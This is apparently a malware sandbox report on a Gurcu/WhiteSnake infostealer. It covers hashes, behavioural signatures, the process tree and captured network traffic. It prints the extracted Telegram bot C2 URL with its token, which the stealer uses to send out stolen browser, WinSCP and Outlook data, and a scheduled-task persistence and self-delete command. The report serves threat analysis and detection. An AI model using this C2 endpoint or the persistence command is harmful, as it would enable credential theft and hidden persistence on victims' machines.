Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

m1f1f3a069...5d.exe

windows7-x64

10

m1f1f3a069...5d.exe

windows10-1703-x64

10

m1f1f3a069...5d.exe

windows10-2004-x64

10

m1f1f3a069...5d.exe

windows11-21h2-x64

10

Resubmissions

10/04/2024, 02:28 UTC

240410-cyaxtsca43 10

10/04/2024, 02:28 UTC

240410-cx45aaca36 10

10/04/2024, 02:28 UTC

240410-cx4hrafc61 10

10/04/2024, 02:28 UTC

240410-cx37zsfc6y 10

14/10/2023, 01:16 UTC

231014-bm3ysshd6t 10

Analysis

  • max time kernel
    616s
  • max time network
    887s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    10/04/2024, 02:28 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    m1f1f3a069223072f8d6802a079235d.exe

  • Size

    306KB

  • MD5

    4b36dcaa94c3eca48a6292bd670ffe79

  • SHA1

    705484e61ac39ba02cc80903be0da6ce74333334

  • SHA256

    c2e57e9b6e52a5429ae7a7bd36c57f63589d78fbf0ffe5760ada4a67b9fadec9

  • SHA512

    cf07d7f80264554eb3b945421ca41db38ff79707775d355d478c09f4b64d14f523339295aa4bc9b79c0dbb004e6756585bcf85edc8cbc2d16f7f0481be93513a

  • SSDEEP

    3072:71E/yXS0m2pOVLVewP2D/kIyC+mvXi1QJIkjXAToknBq9tT/8RJ6W3t3dpdQGqKI:7E2mDMtqa5EOTeKXAllKD9bmTneefA

Score
10/10
gurcucollectionspywarestealer

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6209822134:AAHQxD-CI1YDVcNbXijXHlonsEUgv3dfYtg/sendMessage?chat_id=-1001529292045

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu
  • Executes dropped EXE 2 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
    collection
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\m1f1f3a069223072f8d6802a079235d.exe
    "C:\Users\Admin\AppData\Local\Temp\m1f1f3a069223072f8d6802a079235d.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "m1f1f3a069223072f8d6802a079235d" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\m1f1f3a069223072f8d6802a079235d.exe" &&START "" "C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5036
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:4472
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:3760
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "m1f1f3a069223072f8d6802a079235d" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:4964
        • C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe
          "C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          PID:4588
    • C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe
      C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe
      1⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2220

    Network

    • flag-us
      DNS
      eset.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      eset.com
      IN A
      Response
      eset.com
      IN A
      91.228.166.47
      eset.com
      IN A
      91.228.167.128
    • flag-us
      DNS
      archive.torproject.org
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      archive.torproject.org
      IN A
      Response
      archive.torproject.org
      IN CNAME
      archive-01.torproject.org
      archive-01.torproject.org
      IN A
      159.69.63.226
    • flag-us
      DNS
      blockchain.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      blockchain.com
      IN A
      Response
      blockchain.com
      IN A
      104.16.29.98
      blockchain.com
      IN A
      104.16.30.98
    • flag-us
      DNS
      openai.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      openai.com
      IN A
      Response
      openai.com
      IN A
      13.107.246.64
      openai.com
      IN A
      13.107.213.64
    • flag-sk
      POST
      http://eset.com/FMfO1hNIv5?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      91.228.166.47:80
      Request
      POST /FMfO1hNIv5?q=0 HTTP/1.1
      Host: eset.com
      Content-Length: 40
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Wed, 10 Apr 2024 02:29:14 GMT
      Content-Type: text/html
      Content-Length: 178
      Connection: close
      Location: https://www.eset.com/FMfO1hNIv5?q=0
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-de
      GET
      https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      159.69.63.226:443
      Request
      GET /tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz HTTP/1.1
      Host: archive.torproject.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Server: Apache
      X-Content-Type-Options: nosniff
      X-Frame-Options: sameorigin
      X-Xss-Protection: 1
      Referrer-Policy: no-referrer
      Strict-Transport-Security: max-age=15768000; preload
      Onion-Location: http://uy3qxvwzwoeztnellvvhxh7ju7kfvlsauka7avilcjg7domzxptbq7qd.onion/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
      Last-Modified: Thu, 16 Mar 2023 15:33:36 GMT
      ETag: "d42801-5f7062f2cbbbf"
      Accept-Ranges: bytes
      Content-Length: 13903873
      Cache-Control: max-age=2592000
      Expires: Fri, 10 May 2024 02:29:15 GMT
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-gzip
      Content-Language: en
    • flag-us
      GET
      http://blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.29.98:80
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Wed, 10 Apr 2024 03:29:15 GMT
      Location: https://www.blockchain.com/SrTg2TH7BH?q=4
      X-Content-Type-Options: nosniff
      Set-Cookie: _cfuvid=wQJ3bcqWFhJTFX_xvPnWd.HakPb7_LSz_wpFp6TRqOU-1712716155331-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly
      Server: cloudflare
      CF-RAY: 871f4ee2af16dd87-LHR
    • flag-us
      GET
      http://blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.29.98:80
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Wed, 10 Apr 2024 03:29:15 GMT
      Location: https://www.blockchain.com/SrTg2TH7BH?q=4
      X-Content-Type-Options: nosniff
      Set-Cookie: _cfuvid=OsNzR6JiJlkMzFwAYWgEdHvvzDLbl0YgxPM439zPDfY-1712716155344-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly
      Server: cloudflare
      CF-RAY: 871f4ee2cf6f93f3-LHR
    • flag-us
      GET
      http://blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.29.98:80
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: blockchain.com
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Wed, 10 Apr 2024 03:29:15 GMT
      Location: https://www.blockchain.com/SrTg2TH7BH?q=4
      X-Content-Type-Options: nosniff
      Set-Cookie: _cfuvid=SlMFp1cIMM65GTA1TUqchX89Pd2lD4tlTf6cOMvD_kI-1712716155401-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly
      Server: cloudflare
      CF-RAY: 871f4ee32fa093f3-LHR
    • flag-us
      POST
      http://openai.com/ifMwwwu7Vx?q=1
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      POST /ifMwwwu7Vx?q=1 HTTP/1.1
      Host: openai.com
      Content-Length: 206
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/ifMwwwu7Vx?q=1
      x-azure-ref: 20240410T022915Z-17585d9fd9cmlk4f6x27kadxrg00000006dg00000000fnn9
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T022915Z-17585d9fd9cmlk4f6x27kadxrg00000006dg00000000fnnt
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T022915Z-17585d9fd9cmlk4f6x27kadxrg00000006dg00000000fnnu
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T022915Z-17585d9fd9cmlk4f6x27kadxrg00000006dg00000000fnny
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T022916Z-17585d9fd9cmlk4f6x27kadxrg00000006dg00000000fnp2
      X-Cache: CONFIG_NOCACHE
    • flag-us
      DNS
      www.blockchain.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.blockchain.com
      IN A
      Response
      www.blockchain.com
      IN A
      104.16.30.98
      www.blockchain.com
      IN A
      104.16.29.98
    • flag-us
      POST
      https://openai.com/ifMwwwu7Vx?q=1
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      POST /ifMwwwu7Vx?q=1 HTTP/1.1
      Host: openai.com
      Content-Length: 206
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 405 Method Not Allowed
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Length: 0
      Connection: keep-alive
      Allow: GET, HEAD, OPTIONS
      x-azure-ref: 20240410T022915Z-174cb64fdd7dzw58t2r008535c00000001t0000000003bdx
      X-Cache: TCP_MISS
      cache-control: no-cache
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T022915Z-174cb64fdd7dzw58t2r008535c00000001t0000000003be1
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T022915Z-174cb64fdd7dzw58t2r008535c00000001t0000000003be3
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T022916Z-174cb64fdd7dzw58t2r008535c00000001t0000000003be5
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://www.blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.30.98:443
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: www.blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      content-security-policy: default-src *.blockchain.com; script-src 'self' 'unsafe-eval' https://cdn.polyfill.io https://www.facebook.com http://www.google-analytics.com https://www.google.com https://www.gstatic.com *.blockchain.com *.blockchain.info https://www.googletagmanager.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8 data:; script-src-elem 'self' 'unsafe-inline' https://cdn.polyfill.io http://www.google-analytics.com https://www.googletagmanager.com https://analytics.twitter.com http://static.ads-twitter.com https://connect.facebook.net nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; connect-src 'self' *.blockchain.com *.blockchain.info *.cryptocompare.com https://script.google.com https://webto.salesforce.com/* wss://streamer.cryptocompare.com https://blockchain.info https://api.greenhouse.io *.doubleclick.net *.google.com *.googleusercontent.com https://www.google-analytics.com https://cdn.embedly.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; frame-src 'self' *.blockchain.com *.blockchain.info *.apple.com https://www.google.com https://www.youtube.com https://www.googletagmanager.com https://cdn.embedly.com https://dxmfp9dfv1uwi.cloudfront.net/; img-src 'self' *.blockchain.com *.blockchain.info *.medium.com https://www.googletagmanager.com *.adsrvr.org data: *.cryptocompare.com *.googleusercontent.com https://www.facebook.com http://www.google-analytics.com https://www.google.com http://t.co/i/adsct https://raw.githubusercontent.com *.medium.com; style-src 'self' 'unsafe-inline' https://rsms.me https://fonts.googleapis.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; font-src 'self' https://rsms.me https://fonts.gstatic.com data:; manifest-src 'self'; object-src 'self'; media-src 'self' *.archive.org;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      vary: Accept-Encoding
      x-blockchain-cp-b: blockchain-com
      x-blockchain-cp-f: bm9b 0.001 - 21f4dc4d1d8c733fd82cb011edf6380a
      x-blockchain-language: en
      x-blockchain-language-id: 0:0:0 (en:en:en)
      x-blockchain-server: BlockchainFE/1.0
      x-content-type-options: nosniff
      x-frame-options: SAMEORIGIN
      x-original-host: www.blockchain.com
      x-request-id: 21f4dc4d1d8c733fd82cb011edf6380a
      x-xss-protection: 1; mode=block
      CF-Cache-Status: HIT
      Age: 12
      Set-Cookie: _cfuvid=ytDdYRyIOtOXeMU8EIeYafGdBcjqW_RUJqkWH8FfIiE-1712716155720-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 871f4ee52aab385a-LHR
    • flag-us
      GET
      https://www.blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.30.98:443
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: www.blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      content-security-policy: default-src *.blockchain.com; script-src 'self' 'unsafe-eval' https://cdn.polyfill.io https://www.facebook.com http://www.google-analytics.com https://www.google.com https://www.gstatic.com *.blockchain.com *.blockchain.info https://www.googletagmanager.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8 data:; script-src-elem 'self' 'unsafe-inline' https://cdn.polyfill.io http://www.google-analytics.com https://www.googletagmanager.com https://analytics.twitter.com http://static.ads-twitter.com https://connect.facebook.net nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; connect-src 'self' *.blockchain.com *.blockchain.info *.cryptocompare.com https://script.google.com https://webto.salesforce.com/* wss://streamer.cryptocompare.com https://blockchain.info https://api.greenhouse.io *.doubleclick.net *.google.com *.googleusercontent.com https://www.google-analytics.com https://cdn.embedly.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; frame-src 'self' *.blockchain.com *.blockchain.info *.apple.com https://www.google.com https://www.youtube.com https://www.googletagmanager.com https://cdn.embedly.com https://dxmfp9dfv1uwi.cloudfront.net/; img-src 'self' *.blockchain.com *.blockchain.info *.medium.com https://www.googletagmanager.com *.adsrvr.org data: *.cryptocompare.com *.googleusercontent.com https://www.facebook.com http://www.google-analytics.com https://www.google.com http://t.co/i/adsct https://raw.githubusercontent.com *.medium.com; style-src 'self' 'unsafe-inline' https://rsms.me https://fonts.googleapis.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; font-src 'self' https://rsms.me https://fonts.gstatic.com data:; manifest-src 'self'; object-src 'self'; media-src 'self' *.archive.org;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      vary: Accept-Encoding
      x-blockchain-cp-b: blockchain-com
      x-blockchain-cp-f: bm9b 0.001 - 21f4dc4d1d8c733fd82cb011edf6380a
      x-blockchain-language: en
      x-blockchain-language-id: 0:0:0 (en:en:en)
      x-blockchain-server: BlockchainFE/1.0
      x-content-type-options: nosniff
      x-frame-options: SAMEORIGIN
      x-original-host: www.blockchain.com
      x-request-id: 21f4dc4d1d8c733fd82cb011edf6380a
      x-xss-protection: 1; mode=block
      CF-Cache-Status: HIT
      Age: 12
      Set-Cookie: _cfuvid=im5MYrGp6ndweg3mCCSb53MDOqA.mtC4A.4IH692nSM-1712716155729-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 871f4ee52f83643d-LHR
    • flag-us
      DNS
      www.eset.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.eset.com
      IN A
      Response
      www.eset.com
      IN CNAME
      www-eset-com.trafficmanager.net
      www-eset-com.trafficmanager.net
      IN CNAME
      www.eset.com.edgesuite.net
      www.eset.com.edgesuite.net
      IN CNAME
      a1281.dscr.akamai.net
      a1281.dscr.akamai.net
      IN A
      104.117.77.121
      a1281.dscr.akamai.net
      IN A
      104.117.77.144
    • flag-be
      GET
      https://www.eset.com/FMfO1hNIv5?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.121:443
      Request
      GET /FMfO1hNIv5?q=0 HTTP/1.1
      Host: www.eset.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: text/html
      Content-Length: 162
      Location: https://www.eset.com/FMfO1hNIv5/?q=0
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
